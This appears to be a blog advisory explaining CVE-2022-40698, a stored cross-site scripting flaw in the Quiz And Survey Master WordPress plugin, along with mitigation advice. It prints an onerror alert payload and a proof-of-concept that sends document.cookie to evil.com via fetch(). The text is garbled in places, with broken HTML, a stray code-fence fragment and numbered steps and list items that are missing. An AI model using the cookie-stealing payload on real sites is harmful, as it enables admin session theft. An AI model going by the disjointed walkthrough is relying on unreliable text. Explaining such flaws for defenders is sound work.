In September 2022, a critical Cross-Site Scripting (XSS) vulnerability was discovered in the popular Quiz And Survey Master plugin for WordPress. This vulnerability, tracked as CVE-2022-40698, affects plugin versions up to and including 7.3.10. If you are using this plugin, you might be at risk—even if you only allow subscribers to interact with your quizzes.
This blog post will cover what this vulnerability is, how it works, and how attackers can exploit it. We'll forgo confusing technical jargon where possible, so you can protect your sites and understand what is happening behind the scenes.
What is Cross-Site Scripting (XSS)?
Cross-Site Scripting is a type of security flaw found in web applications. XSS happens when someone is able to make a website load and run untrusted JavaScript code in another user's browser. This can steal cookie data, display fake content, or take over user accounts. XSS is especially dangerous on WordPress, which handles personal and sensitive information.
What is the Quiz And Survey Master Plugin?
Quiz And Survey Master is a hugely popular WordPress plugin for building quizzes, surveys, and forms. It's active on over 40,000 websites. By its nature, this plugin processes lots of user content; if a flaw lets someone inject code here, it can have big consequences.
The Vulnerability – Who Can Exploit It?
CVE-2022-40698 is an *authenticated* XSS, which means only logged-in users of a certain role (subscribers +) can exploit it. Anyone with a basic user account—subscriber or above—can take advantage of it. In many WordPress setups, almost anyone can register as a subscriber.
How Does the Exploit Work?
The flaw is in how Quiz And Survey Master handles custom text fields when creating or editing quizzes or questions.
- The plugin fails to properly sanitize user-supplied input before displaying it on some front-end pages.
- This allows a logged-in user (subscriber or higher) to input specially crafted payloads — usually JavaScript code.
- When another user/admin views a page containing this input, the malicious code is executed in their browser.
Malicious Input
<img src=x onerror=alert('XSS here!')>
If the plugin does not clean this input, it is rendered on the quiz page. The browser sees the <img> tag. Since x is not a valid image, the onerror JavaScript is fired, and the message pops up.
`html
alert('Your site is vulnerable to XSS!')
Proof of Concept (PoC) Code
Here’s a real-world PoC for practical testing (on a test/staging environment only!):
</h2><p> fetch('<a href="https://evil.com/steal?cookie=" rel="nofollow">https://evil.com/steal?cookie=</a>' + document.cookie);<br>
Have an admin visit the quiz or responses page.
4. The admin's browser will attempt to send their cookies to the attacker's server (evil.com). Replace the URL with your own HTTP catcher for testing.
Relevant code (hypothetical vulnerable sanitization)
// Before (vulnerable):
echo $_POST['question_title']; // Directly echoes user input!
// After (fixed):
echo esc_html( $_POST['question_title'] ); // Escapes HTML, blocking XSS!
References
- Original plugin page
- CVE-2022-40698 - NIST National Vulnerability Database
- Plugin vulnerability listing (Patchstack)
- WPScan Advisory
Limit Registrations: Restrict who can become a subscriber.
3. Use Security Plugins: Add protection like Wordfence or Sucuri.
Conclusion
CVE-2022-40698 is a reminder to always keep plugins updated—and to be wary of authenticated users, not just anonymous visitors. Low-privilege user roles can still pose a big threat if plugins mishandle input. If you use Quiz And Survey Master, update now, audit your user roles, and stay safe online.
*If you want more technical details or need help securing your site, please comment below or reach out!*
Timeline
Published on: 11/18/2022 23:15:00 UTC
Last modified on: 11/21/2022 01:29:00 UTC